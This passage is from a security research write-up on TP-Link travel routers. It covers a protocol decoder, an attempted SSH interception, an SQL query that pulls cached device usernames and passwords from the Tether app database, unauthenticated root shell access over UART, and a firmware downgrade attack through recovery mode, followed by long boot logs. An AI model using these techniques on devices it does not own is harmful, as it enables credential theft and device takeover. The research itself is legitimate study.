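        raise ValueError("shorter than the 16-byte header")
    magic, payload_len, opcode, txn_id, tail = HEADER.unpack_from(data)
    if magic != MAGIC:
        raise ValueError(f"unexpected magic {magic:#010x}")
    if payload_len != len(data) - HEADER_LEN:
        raise ValueError(f"header claims {payload_len} payload bytes, "
                         f"datagram carries {len(data) - HEADER_LEN}")
    msg = {"opcode": opcode, "txn_id": txn_id, "tail": tail.hex(), "fields": {}}
    for typ, value in parse_tlvs(data[HEADER_LEN:]):
        name = TLV_NAMES.get(typ, f"type_{typ:#06x}")
        if typ in IPV4_TYPES and len(value) == 4:
            msg["fields"][name] = str(ipaddress.IPv4Address(value))
        elif typ in ASCII_TYPES:
            msg["fields"][name] = value.decode("ascii")
        else:
            msg["fields"][name] = value.hex()  # unknown: keep raw bytes
    return msg


def is_malformed(data: bytes) -> bool:
    """True when the datagram does not match the assumed layout."""
    try:
        decode_discovery(data)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for label, pkt in (("request", REQUEST), ("response", RESPONSE)):
        msg = decode_discovery(pkt)
        print(f"{label}: opcode={msg['opcode']:#06x} txn={msg['txn_id']:#x}")
        for name, value in msg["fields"].items():
            print(f"  {name:12} {value}")
```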

SSH Man-in-the-middle

Using ssh-mitm, it was possible to intercept the credentials on connection establishment between the mobile app and a device. However, the connection then breaks down because Tether notices that something is wrong. I suspect this has to do with an SSH tunnel or similar. Unfortunately I don't know how the Tether app exchanges data via SSH.

Reverse Engineering

The APK can be decompiled using Apktool and jadx.
./assets/tp-link-root-CA.pem
openssl x509 -in tp-link-root-CA.pem --text
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            4f:9c:74:99:ae:d0:9c:83:47:09:0b:e1:9e:6c:d1:f7
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN = tp-link-CA
        Validity
            Not Before: Jan 19 08:27:52 2018 GMT
            Not After : Jan 19 08:37:52 2068 GMT
        Subject: CN = tp-link-CA
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
                Modulus:
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Key Usage:
                Digital Signature, Certificate Sign, CRL Sign
            X509v3 Basic Constraints: critical
                CA:TRUE
            X509v3 Subject Key Identifier:
                C6:ED:A2:05:14:EC:79:FE:62:36:7B:00:0D:58:4C:24:34:16:8B:A9
            1.3.6.1.4.1.311.21.1:
                ...
    Signature Algorithm: sha256WithRSAEncryption
./assets/rsa/app_public_key.pem

Android Cache

The Tether app caches the username, password and other information of configured devices. This information is encrypted using an AES/CBC/PKCS7Padding (256-bit) cipher.
TP_TETHER_CACHE.DB: Model
DEVICE                 (DEVICE_ID, MAC, USER_NAME, PASSWORD, NICK_NAME, NAME, FW_VERSION);
RE_EXTENDED_NETWORK    (SSID, PASSWORD);

FUNCTION_POSITION      (DEVICE_MODEL, FUNCTION_KEY, PAGE, POSITION);
BSSID_RECORD           (BSSID, MODEL, HW_VERSION, FW_VERSION);
RE_DISTANCE_IGNORE     (DEVICE_ID, IGNORE,IGNORE_BIND);
DEVICE_STATISTICS      (ID, TPLINK_ID, HOST_NAME, MAC);
DEVICE_RATE            (MAC, TIME, HAVETRIGGER, MODELNAME, HARDWAREVERSION, FIRMWAREVERSION, APPRATEDTRACKER);
DEVICE_RECORD          (DEVICE_ID, INTO_PARENTAL_CONTROL_TIMES, ONEMESH_VER_TRACKED, SYSTEM_INFO_TRACKED, OPERATION_MODE_TRACKED, OPERATION_MODE_CHANGE_TRACKED);
CLIENTS_RECORD         (ID, MAC, DEVICE_ID, CLIENT_TRACKED, ONEMESH_AVAILABLE_DEVICE_TRACKED, ONEMESH_ADDED_DEVICE_TRACKED);
DEVICE_RECORE_VERSION  (DEVICE_ID, HOMECARE_VERSION_TRACKED);
RE_DISTANCE_IGNORE_V2  (DEVICE_ID, NEAR_IGNORE, FAR_IGNORE, HAS_POST);
TP_TETHER_CACHE.DB: Access
$ cd /data/data/com.tplink.tether/databases
$ sqlite3 TP_TETHER_CACHE.DB

> .tables
> SELECT USER_NAME, PASSWORD FROM DEVICE;

# USER_NAME: CCB759C153B0AFFE39B6F7218238413B
# PASSWORD:  CCB759C153B0AFFE39B6F7218238413B

Cipher: AES/CBC/PKCS7Padding (256bit)

Physical Intervention

Disassembling the TL-WR902AC has proven to be quite hard without damaging the case, and would have been even harder without the internal photos provided to the FCC, which revealed at least the position of the two clips holding the enclosure together. Additionally, the top and bottom parts of the case were lightly molded together, which requires some force when opening. The TL-WR802N is not molded together but has three clips instead.
TL-WR902AC: Printed Circuit Board
TL-WR802N: Printed Circuit Board

On-Chip Debug

UART

A UART connection isn't necessary at any point, but it provides great insight into how the device operates and reacts to incoming requests, and it allows the device's runtime configuration to be examined. The UART can easily be identified by just looking at the PCB. Follow the steps in our documentation Firmware Acquisition Techniques or JTAGulator: Find IoT-Device's UART interface for further information and guidance. Both investigated devices share the same UART configuration of 115200 (8N1) (screen /dev/$S_INT 115200,cs8), but the bootloader uses 115200 (7N1) (screen /dev/$S_INT 115200,cs7).

Note: Both devices provide a root shell without any need for authentication.
UART Pin Assignment

Bootloader

The examined devices both use the Universal Bootloader (U-Boot), but to my knowledge don't provide any means to access the U-Boot command line. Additionally, the serial connection has to be configured to use 115200 (8N1). The only functionality the bootloader provides is starting into recovery mode. This recovery mode allows an image called tp_recovery.bin to be loaded over FTP. To do this, one needs to set up an FTP server with IP address 192.168.0.66 and connect the server to the device to be recovered via an Ethernet cable. With physical access to the device, one could start a downgrade attack, deploying firmware version 170828, which gives an attacker full control over the device without even the need to build a custom malicious image. The recovery mode is started by pressing and holding the reset button until starting recovery... is displayed. This takes about 10 seconds. The device will automatically continue to boot normally if no FTP server or image is found.

TL-WR902AC: Factory Reset Button behavior
// Factory Reset
resetCount ++ 0.
resetCount ++ 1.
resetCount ++ 2.
resetCount ++ 3.
resetCount ++ 4.
resetCount ++ 5.
resetCount ++ 6.
resetCount ++ 7.
resetCount ++ 8.
resetCount ++ 9.
resetCount ++ 10.
resetCount ++ 11.
resetCount ++ 12.
resetCount ++ 13.
resetCount ++ 14.
Factory configuration restored..
spiflash_ioctl_read, Read from 0x007c0000 length 0x10000, ret 0, retlen 0x10000
spiflash_ioctl_write, Write to 0x007c0000 length 0x10000, ret 0, retlen 0x10000

... Soft Reset ...
TL-WR902AC: Load recovery or custom image over FTP
U-Boot 1.1.3 (Aug 22 2017 - 09:54:30)

Board: Ralink APSoC DRAM:  64 MB
relocate_code Pointer at: 83fb4000
******************************
Software System Reset Occurred <------------------------------------------
******************************
gpiomode1 55154444.
gpiomode2 05540555.
flash manufacture id: c8, device id 40 17
find flash: GD25Q64B
============================================
Ralink UBoot Version: 4.3.0.0
--------------------------------------------
ASIC 7628_MP (Port5<->None)
DRAM component: 512 Mbits DDR, width 16
DRAM bus: 16 bit
Total memory: 64 MBytes
Flash component: SPI Flash
Date:Aug 22 2017  Time:09:54:30
============================================
icache: sets:512, ways:4, linesz:32 ,total:65536
dcache: sets:256, ways:4, linesz:32 ,total:32768

 ##### The CPU freq = 580 MHZ ####
 estimate memory size =64 Mbytes
RESET MT7628 PHY!!!!!!..................................................  <---------- Continue holding reset button
starting recovery...
TODO, Read MAC Address from Flash


 netboot_common, argc= 3

 NetTxPacket = 0x83FE38C0

 KSEG1ADDR(NetTxPacket) = 0xA3FE38C0

 NetLoop,call eth_halt !

 NetLoop,call eth_init !
Trying Eth0 (10/100-M)

 Waitting for RX_DMA_BUSY status Start... done


 ETH_STATE_ACTIVE!!
TFTP from server 192.168.0.66; our IP address is 192.168.0.2
Filename 'tp_recovery.bin'.

 TIMEOUT_COUNT=10,Load address: 0x80060000
Loading: T T T T T T T T T T                                              <----------- Timeout
Retry count exceeded; starting again

... Loads Linux ...

Bootlog

TL-WR902AC: AC750 Wifi - Travel Router
Linux version 2.6.36 (soho@soho) (gcc version 4.6.3 (Buildroot 2012.11.1) ) #7 Mon Aug 28 15:55:59 HKT 2017

 The CPU feqenuce set to 575 MHz

 MIPS CPU sleep mode enabled.
CPU revision is: 00019655 (MIPS 24Kc)
Software DMA cache coherency
Determined physical RAM map:
 memory: 04000000 @ 00000000 (usable)
Initrd not found or empty - disabling initrd
Zone PFN ranges:
  Normal   0x00000000 -> 0x00004000
Movable zone start PFN for each node
early_node_map[1] active PFN ranges
    0: 0x00000000 -> 0x00004000
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 16256
Kernel command line: console=ttyS1,115200 root=/dev/mtdblock2 rootfstype=squashfs init=/sbin/init
PID hash table entries: 256 (order: -2, 1024 bytes)
Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
Primary instruction cache 64kB, VIPT, , 4-waylinesize 32 bytes.
Primary data cache 32kB, 4-way, PIPT, no aliases, linesize 32 bytes
Writing ErrCtl register=0006b4ae
Readback ErrCtl register=0006b4ae
Memory: 61076k/65536k available (2715k kernel code, 4460k reserved, 664k data, 168k init, 0k highmem)
NR_IRQS:128
console [ttyS1] enabled
Calibrating delay loop... 386.04 BogoMIPS (lpj=772096)
pid_max: default: 4096 minimum: 301
Mount-cache hash table entries: 512
NET: Registered protocol family 16
RALINK_GPIOMODE = 55154444
RALINK_GPIOMODE = 55144444
***** Xtal 40MHz *****
start PCIe register access
RALINK_RSTCTRL = 2400000
RALINK_CLKCFG1 = fdbfffc0

*************** MT7628 PCIe RC mode *************
PCIE0 enabled
Port 0 N_FTS = 1b105000
init_rt2880pci done
bio: create slab <bio-0> at 0
pci 0000:00:00.0: BAR 0: can't assign mem (size 0x80000000)
pci 0000:00:00.0: BAR 8: assigned [mem 0x20000000-0x201fffff]
pci 0000:00:00.0: BAR 1: assigned [mem 0x20200000-0x2020ffff]
pci 0000:00:00.0: BAR 1: set to [mem 0x20200000-0x2020ffff] (PCI address [0x20200000-0x2020ffff]
pci 0000:01:00.0: BAR 0: assigned [mem 0x20000000-0x200fffff]
pci 0000:01:00.0: BAR 0: set to [mem 0x20000000-0x200fffff] (PCI address [0x20000000-0x200fffff]
pci 0000:01:00.1: BAR 0: assigned [mem 0x20100000-0x201fffff]
pci 0000:01:00.1: BAR 0: set to [mem 0x20100000-0x201fffff] (PCI address [0x20100000-0x201fffff]
pci 0000:00:00.0: PCI bridge to [bus 01-01]
pci 0000:00:00.0:   bridge window [io  disabled]
pci 0000:00:00.0:   bridge window [mem 0x20000000-0x201fffff]
pci 0000:00:00.0:   bridge window [mem pref disabled]
BAR0 at slot 0 = 0
bus=0x0, slot = 0x0
res[0]->start = 0
res[0]->end = 0
res[1]->start = 20200000
res[1]->end = 2020ffff
res[2]->start = 0
res[2]->end = 0
res[3]->start = 0
res[3]->end = 0
res[4]->start = 0
res[4]->end = 0
res[5]->start = 0
res[5]->end = 0
bus=0x1, slot = 0x0
res[0]->start = 20000000
res[0]->end = 200fffff
res[1]->start = 0
res[1]->end = 0
res[2]->start = 0
res[2]->end = 0
res[3]->start = 0
res[3]->end = 0
res[4]->start = 0
res[4]->end = 0
res[5]->start = 0
res[5]->end = 0
bus=0x1, slot = 0x0
res[0]->start = 20100000
res[0]->end = 201fffff
res[1]->start = 0
res[1]->end = 0
res[2]->start = 0
res[2]->end = 0
res[3]->start = 0
res[3]->end = 0
res[4]->start = 0
res[4]->end = 0
res[5]->start = 0
res[5]->end = 0
Switching to clocksource Ralink Systick timer
NET: Registered protocol family 2
IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
TCP established hash table entries: 2048 (order: 2, 16384 bytes)
TCP bind hash table entries: 2048 (order: 1, 8192 bytes)
TCP: Hash tables configured (established 2048 bind 2048)
TCP reno registered
NET: Registered protocol family 1
RT3xxx EHCI/OHCI init.
squashfs: version 4.0 (2009/01/31) Phillip Lougher
fuse init (API version 7.15)
msgmni has been set to 119
io scheduler noop registered
io scheduler deadline registered (default)
gpiomode1 55144444.
gpiomode2 00000445.
Ralink gpio driver initialized
Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
serial8250: ttyS0 at MMIO 0x10000d00 (irq = 21) is a 16550A
serial8250: ttyS1 at MMIO 0x10000c00 (irq = 20) is a 16550A
brd: module loaded
flash manufacture id: c8, device id 40 17
GD25Q64B(c8 40170000) (8192 Kbytes)
mtd .name = raspi, .size = 0x00800000 (8M) .erasesize = 0x00010000 (64K) .numeraseregions = 0
Creating 7 MTD partitions on "raspi":
0x000000000000-0x000000020000 : "boot"
0x000000020000-0x000000160000 : "kernel"
0x000000160000-0x0000007c0000 : "rootfs"
mtd: partition "rootfs" set to be root filesystem
0x0000007c0000-0x0000007d0000 : "config"
0x0000007d0000-0x0000007e0000 : "romfile"
0x0000007e0000-0x0000007f0000 : "rom"
0x0000007f0000-0x000000800000 : "radio"
Register flash device:flash0
PPP generic driver version 2.4.2
PPP MPPE Compression module registered
NET: Registered protocol family 24
Mirror/redirect action on
u32 classifier
    Actions configured
Netfilter messages via NETLINK v0.30.
nf_conntrack version 0.5.0 (954 buckets, 3816 max)
ip_tables: (C) 2000-2006 Netfilter Core Team, Type=Linux
TCP cubic registered
NET: Registered protocol family 10
ip6_tables: (C) 2000-2006 Netfilter Core Team
IPv6 over IPv4 tunneling driver
NET: Registered protocol family 17
Ebtables v2.0 registered
802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com>
All bugs added by David S. Miller <davem@redhat.com>
VFS: Mounted root (squashfs filesystem) readonly on device 31:2.
Freeing unused kernel memory: 168k freed
starting pid 691, tty '': '/etc/init.d/rcS'
rdm_major = 253
SCSI subsystem initialized
spiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
Read MAC from flash(  7df100) ffffff98-ffffffda-ffffffc4-6e-00-fffffffc
GMAC1_MAC_ADRH -- : 0x000098da
GMAC1_MAC_ADRL -- : 0xc46e00fc
Ralink APSoC Ethernet Driver Initilization. v3.1  256 rx/tx descriptors allocated, mtu = 1500!
NAPI enable, Tx Ring = 256, Rx Ring = 256
spiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
Read MAC from flash(  7df100) ffffff98-ffffffda-ffffffc4-6e-00-fffffffc
GMAC1_MAC_ADRH -- : 0x000098da
GMAC1_MAC_ADRL -- : 0xc46e00fc
PROC INIT OK!
usbcore: registered new interface driver usbfs
usbcore: registered new interface driver hub
usbcore: registered new device driver usb
ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
FM_OUT value: u4FmOut = 0(0x00000000)
FM_OUT value: u4FmOut = 125(0x0000007D)
FM detection done! loop = 1
SR calibration value u1SrCalVal = 7
rt3xxx-ehci rt3xxx-ehci: Ralink EHCI Host Controller
rt3xxx-ehci rt3xxx-ehci: new USB bus registered, assigned bus number 1
rt3xxx-ehci rt3xxx-ehci: irq 18, io mem 0x101c0000
rt3xxx-ehci rt3xxx-ehci: USB 0.0 started, EHCI 1.00
hub 1-0:1.0: USB hub found
hub 1-0:1.0: 1 port detected
ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
rt3xxx-ohci rt3xxx-ohci: RT3xxx OHCI Controller
rt3xxx-ohci rt3xxx-ohci: new USB bus registered, assigned bus number 2
rt3xxx-ohci rt3xxx-ohci: irq 18, io mem 0x101c1000
hub 2-0:1.0: USB hub found
hub 2-0:1.0: 1 port detected
Initializing USB Mass Storage driver...
usbcore: registered new interface driver usb-storage
USB Mass Storage support registered.
add domain:tplinkwifi.net
add domain:tplinklogin.net
tp_domain init ok
/etc/init.d/rcS: line 78: telnetd: not found
L2TP core driver, V2.0
PPPoL2TP kernel driver, V2.0
Set: phy[0].reg[0] = 3900
Set: phy[1].reg[0] = 3900
Set: phy[2].reg[0] = 3900
Set: phy[3].reg[0] = 3900
Set: phy[4].reg[0] = 3900
Set: phy[0].reg[0] = 3300
Set: phy[1].reg[0] = 3300
Set: phy[2].reg[0] = 3300
Set: phy[3].reg[0] = 3300
Set: phy[4].reg[0] = 3300
resetMiiPortV over.
starting pid 778, tty '/dev/ttyS1': '/bin/sh'
~ # [ util_execSystem ] 139:  ipt_init cmd is "/var/tmp/dconf/rc.router"

[ dm_readFile ] 2061:  can not open xml file /var/tmp/pc/reduced_data_model.xml!, about to open file /etc/reduced_data_model.xml
spiflash_ioctl_read, Read from 0x007c0000 length 0x10000, ret 0, retlen 0x10000
spiflash_ioctl_read, Read from 0x007c0000 length 0xad26, ret 0, retlen 0xad26
===>Enter Routerspiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
 mode
spiflash_ioctl_read, Read from 0x007df200 length 0x4, ret 0, retlen 0x4
spiflash_ioctl_read, Read from 0x007df300 length 0x4, ret 0, retlen 0x4
spiflash_ioctl_read, Read from 0x007df400 length 0x10, ret 0, retlen 0x10
spiflash_ioctl_read, Read from 0x007df500 length 0x29, ret 0, retlen 0x29
spiflash_ioctl_read, Read from 0x007df600 length 0x21, ret 0, retlen 0x21
spiflash_ioctl_read, Read from 0x007df700 length 0x10, ret 0, retlen 0x10
spiflash_ioctl_read, Read from 0x007df700 length 0x10, ret 0, retlen 0x10
spiflash_ioctl_read, Read from 0x00020000 length 0x1d0, ret 0, retlen 0x1d0
spiflash_ioctl_read, Read from 0x007df100 length 0x6, ret 0, retlen 0x6
sendto: No such file or directory
pid 777 send 2001 error
[ util_execSystem ] 139:  oal_startDynDns cmd is "dyndns /var/tmp/dconf/dyndns.conf"

[ oal_sys_getOldTZInfo ] 519:  Open TZ file error!
[ util_execSystem ] 139:  oal_sys_unsetTZ cmd is "echo "" > /etc/TZ"
[ util_execSystem ] 139:  oal_startNoipDns cmd is "noipdns /var/tmp/dconf/noipdns.conf"
[ util_execSystem ] 139:  oal_startCmxDns cmd is "cmxdns /var/tmp/dconf/cmxdns.conf"

ioctl: No such device
[ util_execSystem ] 139:  oal_br_addBridge cmd is "brctl addbr br0;brctl setfd br0 0;brctl stp br0 off"
[ util_execSystem ] 139:  oal_ipt_addLanRules cmd is "iptables -t filter -A INPUT -i br+ -j ACCEPT
[ util_execSystem ] 139:  oal_intf_setIntf cmd is "ifconfig br0 192.168.1.1 netmask 255.255.255.0 up"
[ util_execSystem ] 139:  oal_util_setProcLanAddr cmd is "echo "br0 16885952," > /proc/net/conRaeth v3.1 (ntract_LocalAddrNAPI

[ util_exec,SkbRecycleSystem ] 139:  o)
al_intf_enableIn
phy_tx_ring = 0x0318b000, tx_ring = 0xa318b000
tf cmd is "ifcon
phy_rx_ring0 = 0x0318c000, rx_ring0 = 0xa318c000
fig eth0 up"

[fe_sw_init:5185]rt305x_esw_init.
disable switch phyport...
GMAC1_MAC_ADRH -- : 0x000098da
GMAC1_MAC_ADRL -- : 0xc46e00fc
RT305x_ESW: Link Status Changed
[ rsl_getUnusedVlan ] 1042:  GET UNUSED VLAN TAG 1 : [3]
[ rsl_getUnusedVlan ] 1042:  GET UNUSED VLAN TAG 2 : [4]
[ rsl_getUnusedVlan ] 1042:  GET UNUSED VLAN TAG 3 : [5]
[ rsl_getUnusedVlan ] 1042:  GET UNUSED VLAN TAG 4 : [6]
[ util_execSystem ] 139:  oal_addVlanTagIntf cmd is "vconfig add eth0 3"
[ util_execSystem ] 139:  oal_intf_enableIntf cmd is "ifconfig eth0.3 up"

set if eth0.3 to *not wan dev
[ util_execSystem ] 139:  oal_addVlanTagIntf cmd is "vconfig add eth0 4"
[ util_execSystem ] 139:  oal_intf_enableIntf cmd is "ifconfig eth0.4 up"

set if eth0.4 to *not wan dev
[ util_execSystem ] 139:  oal_addVlanTagIntf cmd is "vconfig add eth0 5"
[ util_execSystem ] 139:  oal_intf_enableIntf cmd is "ifconfig eth0.5 up"

set if eth0.5 to *not wan dev
[ util_execSystem ] 139:  oal_addVlanTagIntf cmd is "vconfig add eth0 6"
[ util_execSystem ] 139:  oal_intf_enableIntf cmd is "ifconfig eth0.6 up"

set if eth0.6 to *not wan dev
[ util_execSystem ] 139:  oal_addVlanTagIntf cmd is "vconfig add eth0 2"
[ util_execSystem ] 139:  oal_intf_enableIntdevice eth0.3 entered promiscuous mode
f cmd is "ifconfdevice eth0 entered promiscuous mode
ig eth0.2 up"
br0: port 1(eth0.3) entering forwarding state

set if eth0.2 tbr0: port 1(eth0.3) entering forwarding state
o wan dev
[ vlan_addLanPortsIntoBridge ] 574:  add lan Port 255 from br0
[ utidevice eth0.4 entered promiscuous mode
l_execSystem ] 1br0: port 2(eth0.4) entering forwarding state
39:  oal_br_addIbr0: port 2(eth0.4) entering forwarding state
ntfIntoBridge cmd is "brctl addif br0 eth0.3"
[ util_execSystem ] 139:  oal_bdevice eth0.5 entered promiscuous mode
r_addIntfIntoBribr0: port 3(eth0.5) entering forwarding state
dge cmd is "brctbr0: port 3(eth0.5) entering forwarding state
l addif br0 eth0.4"
[ util_execSystem ] 139:  oal_br_addIntfIntoBridge cmd isdevice eth0.6 entered promiscuous mode
 "brctl addif brbr0: port 4(eth0.6) entering forwarding state
0 eth0.5"

[ ubr0: port 4(eth0.6) entering forwarding state
til_execSystem ] 139:  oal_br_addIntfIntoBridge cmd is "brctl addif br0 eth0.6"
[ util_execSystem ] 139:  rsl_initIPv6CfgObj cmd is "echo 1 > /proc/sys/net/ipv6/conf/all/disable_ipv6"
[ util_execSystem ] 139:  oal_eth_setIGMPSnoopParam cmd is "for i in /sys/devices/virtual/net/*/bridge/multicast_snooping;do echo 1 > $i ; done"
[ util_execSystem ] 139:  oal_wlan_ra_setCountryRegion cmd is "cp /etc/SingleSKU_CE.dat /var/Wireless/RT2860AP/SingleSKU.dat"
[ util_execSystem ] 139:  oal_wlan_ra_setCountryRegion cmd is "iwpriv ra0 set CountryRegion=1"

ra0       no private ioctls.
[ util_execSystem ] 166:  execute ok, exit status = 255
[ util_execSystem ] 139:  oal_wlan_ra_loadDriver cmd is "insmod /lib/modules/kmdir/kernel/drivers/net/wireless/mt_wifi_ap/mt_wifi.ko"

ADDRCONF(NETDEV_CHANGE): eth0.4: link becomes ready
ADDRCONF(NETDEV_CHANGE): eth0.5: link becomes ready
ADDRCONF(NETDEV_CHANGE): eth0.6: link becomes ready
ADDRCONF(NETDEV_CHANGE): eth0.2: link becomes ready


=== pAd = c0988000, size = 1493064 ===

<-- RTMPAllocTxRxRingMemory, Status=0, ErrorValue=0x
<-- RTMPAllocAdapterBlock, Status=0
RtmpChipOpsHook(492): Not support for HIF_MT yet!
mt7628_init()-->
mt7628_init(FW(8a00), HW(8a01), CHIPID(7628))
e2.bin mt7628_init(1156)::(2), pChipCap->fw_len(64560)
mt_bcn_buf_init(218): Not support for HIF_MT yet!
<--mt7628_init()
[ util_execSystem ] 139:  oal_wlan_ra_initWlan cmd is "ifconfig ra0 up"

TX_BCN DESC a277c000 size = 320
RX[0] DESC a2780000 size = 2048
RX[1] DESC a2781000 size = 2048
RT_CfgSetApcliMacAddress : invalid mac setting
cfg_mode=9
cfg_mode=9
wmode_band_equal(): Band Equal!
AndesSendCmdMsg: Could not send in band command due to diable fRTMP_ADAPTER_MCU_SEND_IN_BAND_CMD
APSDCapable[0]=0
APSDCapable[1]=0
APSDCapable[2]=0
APSDCapable[3]=0
APSDCapable[4]=0
APSDCapable[5]=0
APSDCapable[6]=0
APSDCapable[7]=0
APSDCapable[8]=0
APSDCapable[9]=0
APSDCapable[10]=0
APSDCapable[11]=0
APSDCapable[12]=0
APSDCapable[13]=0
APSDCapable[14]=0
APSDCapable[15]=0
default ApCliAPSDCapable[0]=0
Key1Str is Invalid key length(0) or Type(0)
Key1Str is Invalid key length(0) or Type(0)
Key2Str is Invalid key length(0) or Type(0)
Key2Str is Invalid key length(0) or Type(0)
Key3Str is Invalid key length(0) or Type(0)
Key3Str is Invalid key length(0) or Type(0)
Key4Str is Invalid key length(0) or Type(0)
Key4Str is Invalid key length(0) or Type(0)
WscKeyASCII=8
WscKeyASCII=8
[RTMPReadParametersHook:297]wifi read profile faild.
load fw image from fw_header_image
AndesMTLoadFwMethod1(2263)::pChipCap->fw_len(64560)
FW Version:1
FW Build Date:20161213152835
CmdAddressLenReq:(ret = 0)
CmdFwStartReq: override = 1, address = 1048576
CmdStartDLRsp: WiFI FW Download Success
MtAsicDMASchedulerInit(): DMA Scheduler Mode=0(LMAC)
efuse_probe: efuse = 10000002
RtmpChipOpsEepromHook::e2p_type=2, inf_Type=4
RtmpEepromGetDefault::e2p_dafault=2
RtmpChipOpsEepromHook: E2P type(2), E2pAccessMode = 2, E2P default = 2
NVM is FLASH mode
1. Phy Mode = 14
exec!
spiflash_ioctl_read, Read from 0x007f0000 length 0x400, ret 0, retlen 0x400
eeFlashId = 0x7628!
Country Region from e2p = ffff
tssi_1_target_pwr_g_band = 32
2. Phy Mode = 14
3. Phy Mode = 14
NICInitPwrPinCfg(11): Not support for HIF_MT yet!
NICInitializeAsic(651): Not support rtmp_mac_sys_reset () for HIF_MT yet!
mt_mac_init()-->
MtAsicInitMac()-->
mt7628_init_mac_cr()-->
MtAsicSetMacMaxLen(1277): Set the Max RxPktLen=450!
<--mt_mac_init()
        WTBL Segment 1 info:
                MemBaseAddr/FID:0x28000/0
                EntrySize/Cnt:32/128
        WTBL Segment 2 info:
                MemBaseAddr/FID:0x40000/0
                EntrySize/Cnt:64/128
        WTBL Segment 3 info:
                MemBaseAddr/FID:0x42000/64
                EntrySize/Cnt:64/128
        WTBL Segment 4 info:
                MemBaseAddr/FID:0x44000/128
                EntrySize/Cnt:32/128
AntCfgInit(2946): Not support for HIF_MT yet!
MCS Set = ff ff 00 00 01
MtAsicSetChBusyStat(861): Not support for HIF_MT yet!
[PMF]ap_pmf_init:: apidx=0, MFPC=0, MFPR=0, SHA256=0
[PMF]RTMPMakeRsnIeCap: RSNIE Capability MFPC=0, MFPR=0
[PMF]ap_pmf_init:: apidx=1, MFPC=0, MFPR=0, SHA256=0
MtAsicSetRalinkBurstMode(3048): Not support for HIF_MT yet!
MtAsicSetPiggyBack(796): Not support for HIF_MT yet!
FW LOG: !!!! Pass, dont need recal (total fail[0])

reload DPD from flash , 0x9F = [ca00] doReload bit7[0]
CmdLoadDPDDataFromFlash: Channel = 11, DoReload = 0
MtAsicSetTxPreamble(3027): Not support for HIF_MT yet!
CmdSlotTimeSet:(ret = 0)
MtAsicAddSharedKeyEntry(1344): Not support for HIF_MT yet!
MtAsicSetPreTbtt(): bss_idx=0, PreTBTT timeout = 0xf0
ap_ftkd> Initialize FT KDP Module...
Main bssid = 98:da:c4:6e:00:fc
<==== rt28xx_init, Status=0
@@@ ed_monitor_init : ===>
@@@ ed_monitor_init : <===
mt7628_set_ed_cca: TURN ON EDCCA mac 0x10618 = 0xd7c87d0f, EDCCA_Status=1
WiFi Startup Cost (ra0): 0.748s
[ util_execSystem ] 139:  oal_wlan_ra_initWlan cmd is "echo 1 > /proc/tplink/led_wlan_24G"
[ util_execSystem ] 139:  oal_wlan_ra_setStaNum cmd is "iwpriv ra0 set MaxStaNum=32"
[ util_execSystem ] 139:  device ra0 entered promiscuous mode
oal_br_addIntfInbr0: port 5(ra0) entering forwarding state
toBridge cmd is br0: port 5(ra0) entering forwarding state
"brctl addif br0 ra0"
[ util_execSystem ] 139:  oal_br_addIntfIntoBridge cmd device apcli0 entered promiscuous mode
is "brctl addif br0 apcli0"
[ util_execSystem ] 139:  oal_br_addIntfIntoBridgdevice ra1 entered promiscuous mode
e cmd is "brctl addif br0 ra1"

[ util_execSyste
====
@@@ ed_status_read: EDCCA TH - H
pAd->ed_trigger_cnt : 0 > 20 ||  pAd->ed_big_rssi_stat : 0 < 50
====
m ] 139:  oal_wlan_ra_initEnd cmd is "wlNetlinkTspiflash_ioctl_read, Read from 0x007f0000 length 0x2, ret 0, retlen 0x2
ool &"
[ util_execSystem ] 139:  oal_wlan_ra_initEnd cmd is "killall -q wscd"
[ util_execSystem ] 166:  execute ok, exit status = 1
[ util_execSystem ] 139:  oal_wlan_ra_initEnd cmd is "wscd -i ra0 -m 1 -w /var/tmp/wsc_upnp/ &"
[ util_execSystem ] 139:  rsl_initLanWlanObj cmd is "echo 0 > /proc/tplink/wl_mode"
[ util_execSystem ] 139:  oal_wlan_ra_setCountryRegion cmd is "cp /etc/SingleSKU_5G_CE.dat /var/Wireless/RT2860AP/SingleSKU_5G.dat"

WLAN-Start wlNetlinkTool
Waiting for Wireless Events from interfaces...
swWlanChkAhbErr: netlink to do
[ util_execSystem ] 139:  oal_wlan_ra_setCountryRegion cmd is "iwpriv rai0 set CountryRegionABand=1"

rai0      no private ioctls.
[ util_execSystem ] 166:  execute ok, exit status = 255
[ util_execSystem ] 139:  oal_wlan_ra_loadDriver cmd is "insmod /lib/modules/kmdir/kernel/drivers/net/wireless/MT7610_ap/MT7610_ap.ko"

wscd: SSDP UDP PORT = 1900


=== pAd = c1002000, size = 1368440 ===

<-- RTMPAllocTxRxRingMemory, Status=0
<-- RTMPAllocAdapterBlock, Status=0
device_id =0x7650
Read eeprom data from flash into memory!
spiflash_ioctl_read, Read from 0x007f8000 length 0x200, ret 0, retlen 0x200
==>MT76x0_WLAN_ChipOnOff(): OnOff:1, pAd->WlanFunCtrl:0x0, Reg-WlanFunCtrl=0xff000002
MACVersion = 0x76502000
[ util_execSystem ] 139:  oal_wlan_ra_initWlan cmd is "ifconfig rai0 up"

load fw spent 16ms
RX DESC a2078000 size = 4096
RX1 DESC a2079000 size = 4096
cfg_mode=14
cfg_mode=14
wmode_band_equal(): Band Not Equal!
1. Phy Mode = 49
2. Phy Mode = 49
ERROR!!! E2PROM: WRONG VERSION 0x2, should be 1
ext_pa_current_setting = 1
MT76x0_TssiTableAdjust: upper_bound = 0x7F decimal: 127
MT76x0_TssiTableAdjust: lower_bound = 0xFFFFFF80 decimal: -128
